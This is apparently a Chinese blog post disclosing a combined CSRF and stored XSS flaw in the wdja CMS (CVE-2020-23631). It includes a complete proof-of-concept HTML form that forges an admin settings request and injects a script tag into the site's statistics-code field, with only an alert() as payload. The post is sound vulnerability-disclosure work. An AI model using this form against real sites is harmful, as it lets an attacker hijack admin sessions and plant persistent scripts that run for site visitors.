Fork me on github

wdja漏洞 csrf+xss 组和漏洞

更新:已收录 CVE-2020-23631 CVE-2020-23631       CNNVD-202101-508


 

首先存在csrf漏洞,在项目issues里:https://github.com/shadoweb/wdja/issues/11面都提到过,通过配合可以实现这样的攻击思路:

全站配置-》统计代码-》存在xss攻击

构建的 CSRF EXP:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://wdja/admin/global/manage.php?action=basic&backurl=/admin/global/manage.php?type=basic" method="POST">
      <input type="hidden" name="logo" value="" />
      <input type="hidden" name="download_name" value="" />
      <input type="hidden" name="download_url" value="" />
      <input type="hidden" name="demo_url" value="" />
      <input type="hidden" name="modules" value="download" />
      <input type="hidden" name="modules_img" value="download" />
      <input type="hidden" name="icp" value="" />
      <input type="hidden" name="tongji" value="<script>alert('csrf+xss漏洞')</script>"/>
      <input type="hidden" name="title" value="" />
      <input type="hidden" name="topic" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="description" value="" />
      <input type="hidden" name="baidupush_url" value="" />
      <input type="hidden" name="baidupush_token" value="" />
      <input type="hidden" name="baidupush" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

 


攻击截图:

 

posted @ 2020-06-12 21:55  未配妥剑,已入江湖  阅读(528)  评论(0编辑  收藏  举报